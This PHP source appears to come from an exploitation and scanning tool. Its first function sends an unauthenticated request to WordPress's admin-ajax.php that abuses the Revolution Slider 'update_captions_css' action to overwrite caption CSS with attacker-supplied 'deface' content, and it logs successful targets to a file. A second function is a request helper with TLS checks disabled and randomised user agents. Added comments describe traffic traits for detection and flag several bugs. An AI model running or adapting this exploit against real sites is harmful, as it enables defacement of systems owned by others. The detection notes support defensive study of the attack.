/**
 * Sends a single POST to {target}/wp-admin/admin-ajax.php that asks the
 * revslider plugin's AJAX handler to run "update_captions_css" with
 * caller-supplied content, then reports whether the reply contained "true".
 *
 * Defender's view: everything below is visible on the wire and in access logs.
 * The request is a POST to /wp-admin/admin-ajax.php carrying
 * action=revslider_ajax_action and client_action=update_captions_css, and the
 * URL printed on success is a GET with client_action=get_captions_css. No login
 * step is visible in this function. These field values are stable strings to
 * match in WAF rules and log searches. Sites running the plugin should be on a
 * fixed release and should not serve this action to unauthenticated clients.
 *
 * @param array $__ Reads the keys 'target' (URL prefix placed before
 *                  /wp-admin/admin-ajax.php), 'proxy' (proxy string or null),
 *                  'deface' (sent as the "data" field) and 'line' (text
 *                  printed after each status message).
 * @return void Writes status lines to stdout; when the reply matches, appends
 *              the get_captions_css URL to revslider.txt in the working directory.
 */
function __request($__) {
    $curlxpl = curl_init();
    curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php");
    // The proxy is only configured when the caller supplied a non-null value.
    !is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL;
    // The User-Agent comes from __setUserAgentRandom(), defined elsewhere in the file.
    curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom());
    curl_setopt($curlxpl, CURLOPT_POST, 1);
    // PHP encodes an array given to CURLOPT_POSTFIELDS as multipart/form-data,
    // so the three fields arrive as form parts rather than a urlencoded body.
    curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => $__['deface']));
    curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1);
    // NOTE(review): certificate and hostname verification are both switched off,
    // so the reply is not authenticated as coming from the named host.
    curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0);
    // Cookies are read from and written to cookie.log in the working directory.
    curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log');
    curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log');
    // curl_exec() returns false on failure, which concatenates as an empty string.
    // The return value of __plus() (defined elsewhere) is appended to the body.
    $result = curl_exec($curlxpl) . __plus();
    // NOTE(review): the check is a case-insensitive search for "true" anywhere in
    // the reply, so any page containing that word is reported as a match.
    // eregi() belongs to the ext/ereg API that was removed in PHP 7.0.
    if (eregi('true', $result)) {
        $h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
        echo "[!] [INFO] Success Exploit!\n";
        echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n";
        __plus();
        // Matched URLs accumulate in revslider.txt, one per block, in append mode.
        file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND);
    } else {
        echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n";
    }
    curl_close($curlxpl);
    unset($curlxpl);
}
/**
 * Fetches one or more URLs through the curl_multi API and returns the body,
 * transfer info, error text and a one-line status summary.
 *
 * Only one result set is returned: the collection loop overwrites $ret[0..2]
 * on every iteration, so when several URLs are given the caller receives the
 * data of the last one.
 *
 * Request options are taken from $_SESSION['config'] (keys read here:
 * 'http-header', 'user-agent', 'url-reference', 'verifica_info', 'debug',
 * 'time-out', 'file-cookie'). Several values pass through __crypt(), and
 * __plus() is called between steps; both are defined elsewhere and their
 * effect is not visible in this block.
 *
 * Defender's view: every request carries the fixed header
 * "Cookie: disclaimer_accepted=true" regardless of configuration, which is a
 * constant trait to look for in captured traffic. User-Agent and Referer come
 * from configuration or from the *Random() helpers.
 *
 * NOTE(review): TLS peer and host verification are disabled for every
 * transfer, so response content and the Server / X-Powered-By values
 * summarised in 'info' are not authenticated.
 *
 * @param string|array $url_      URL or list of URLs (passed through __crypt() first).
 * @param string|null  $proxy     Proxy for CURLOPT_PROXY; skipped when null.
 * @param array|null   $postDados Field => value pairs for a POST body; only the
 *                                values are urlencoded, the keys are sent as given.
 * @return array|false array('corpo' => body, 'server' => curl_getinfo() result,
 *                     'error' => curl_error() text, 'info' => status summary),
 *                     or FALSE when $ret[0] is unset or null.
 */
function __request_info($url_, $proxy = NULL, $postDados = NULL) {
    $url_ = __crypt($url_);
    $mh = curl_multi_init();
    $curl_array = array();
    // Normalise to a list so a single URL and an array share one code path.
    $nodes = is_array($url_) ? $url_ : array($url_);
    foreach ($nodes as $i => $url) {
        $curl_array[$i] = curl_init($url);
        __plus();
        // Format the POST body, applying urlencode to each POST value.
        // NOTE(review): $postDados_format is never initialised and is not reset
        // per URL. The first ".=" acts on an undefined variable, and with more
        // than one URL the pairs are appended to the previous (already trimmed)
        // body with no "&" between them.
        if (not_isnull_empty($postDados) && is_array($postDados)) {
            foreach ($postDados as $campo => $valor) {
                $postDados_format .= "{$campo}=" . urlencode($valor) . '&';
            }
            // Drop the trailing "&" left by the loop above.
            $postDados_format = rtrim($postDados_format, '&');
            // The field count is passed as the (truthy) CURLOPT_POST flag.
            curl_setopt($curl_array[$i], CURLOPT_POST, count($postDados));
            curl_setopt($curl_array[$i], CURLOPT_POSTFIELDS, __crypt($postDados_format));
        }
        // Configured headers are split on commas, then the fixed Cookie header
        // is always appended after them.
        curl_setopt($curl_array[$i], CURLOPT_HTTPHEADER, array_merge(not_isnull_empty($_SESSION['config']['http-header']) ? explode(',', __crypt($_SESSION['config']['http-header'])) : array(), array("Cookie: disclaimer_accepted=true")));
        curl_setopt($curl_array[$i], CURLOPT_USERAGENT, not_isnull_empty($_SESSION['config']['user-agent']) ? __crypt($_SESSION['config']['user-agent']) : __setUserAgentRandom());
        curl_setopt($curl_array[$i], CURLOPT_REFERER, not_isnull_empty($_SESSION['config']['url-reference']) ? __crypt($_SESSION['config']['url-reference']) : __setURLReferenceRandom());
        !is_null($proxy) ? curl_setopt($curl_array[$i], CURLOPT_PROXY, $proxy) : NULL;
        // Response headers are included in the returned body only when
        // 'verifica_info' is set; the status regexes below depend on that.
        !is_null($_SESSION['config']['verifica_info']) ? curl_setopt($curl_array[$i], CURLOPT_HEADER, 1) : NULL;
        // Verbose output needs both 'verifica_info' and a truthy
        // __validateOptions('3,6', debug) result.
        !is_null($_SESSION['config']['verifica_info']) && __validateOptions('3,6', $_SESSION['config']['debug']) ? curl_setopt($curl_array[$i], CURLOPT_VERBOSE, 1) : NULL;
        __plus();
        // NOTE(review): certificate chain and hostname checks are both disabled.
        curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($curl_array[$i], CURLOPT_FRESH_CONNECT, 1);
        curl_setopt($curl_array[$i], CURLOPT_RETURNTRANSFER, 1);
        // Connect and total timeouts share the 'time-out' setting (default 5).
        curl_setopt($curl_array[$i], CURLOPT_CONNECTTIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ? $_SESSION['config']['time-out'] : 5);
        curl_setopt($curl_array[$i], CURLOPT_TIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ? $_SESSION['config']['time-out'] : 5);
        // The cookie store is the configured 'file-cookie', else cookie.txt.
        curl_setopt($curl_array[$i], CURLOPT_COOKIEFILE, not_isnull_empty($_SESSION['config']['file-cookie']) ? $_SESSION['config']['file-cookie'] : 'cookie.txt');
        curl_setopt($curl_array[$i], CURLOPT_COOKIEJAR, not_isnull_empty($_SESSION['config']['file-cookie']) ? $_SESSION['config']['file-cookie'] : 'cookie.txt');
        curl_multi_add_handle($mh, $curl_array[$i]);
    }
    $running = NULL;
    // Drive all transfers, polling every 100 microseconds until none is running.
    do {
        usleep(100);
        curl_multi_exec($mh, $running);
    } while ($running > 0);
    $ret = array();
    // Each pass overwrites the same three slots, so only the last URL's data survives.
    foreach ($nodes as $i => $url) {
        $ret[0] = curl_multi_getcontent($curl_array[$i]);
        $ret[1] = curl_getinfo($curl_array[$i]);
        $ret[2] = curl_error($curl_array[$i]);
    }
    foreach ($nodes as $i => $url) {
        curl_multi_remove_handle($mh, $curl_array[$i]);
    }
    $status = NULL;
    // The parentheses are the PCRE delimiters here, not a capture group, so
    // index [0] of each result holds the full-line matches.
    preg_match_all('(HTTP.*)', $ret[0], $status['http']);
    preg_match_all('(Server:.*)', $ret[0], $status['server']);
    preg_match_all('(X-Powered-By:.*)', $ret[0], $status['X-Powered-By']);
    __plus();
    // Join the first match of each pattern into one line with CR/LF stripped.
    // NOTE(review): when a pattern has no match the [0][0] offset is undefined,
    // and when headers were not requested any match comes from body text.
    $ret[3] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}"));
    __debug(array('debug' => "[ BODY ]{$ret[0]}", 'function' => '__request_info'), 4);
    __plus();
    // NOTE(review): if $url_ is still an array here, it is interpolated as the
    // string "Array". Confirm what __crypt() returns for list input.
    __debug(array('debug' => "[ URL ]{$url_}", 'function' => '__request_info'), 2);
    __plus();
    // The "." only serves to evaluate both calls in one statement.
    // NOTE(review): unlink() always targets the literal cookie.txt, even when
    // 'file-cookie' names another file, and warns if cookie.txt is absent.
    curl_multi_close($mh) . unlink('cookie.txt');
    __plus();
    // No curl_close() call on the easy handles is visible; they are only dropped here.
    unset($curl_array);
    return isset($ret[0]) ? array('corpo' => $ret[0], 'server' => $ret[1], 'error' => $ret[2], 'info' => $ret[3]) : FALSE;
}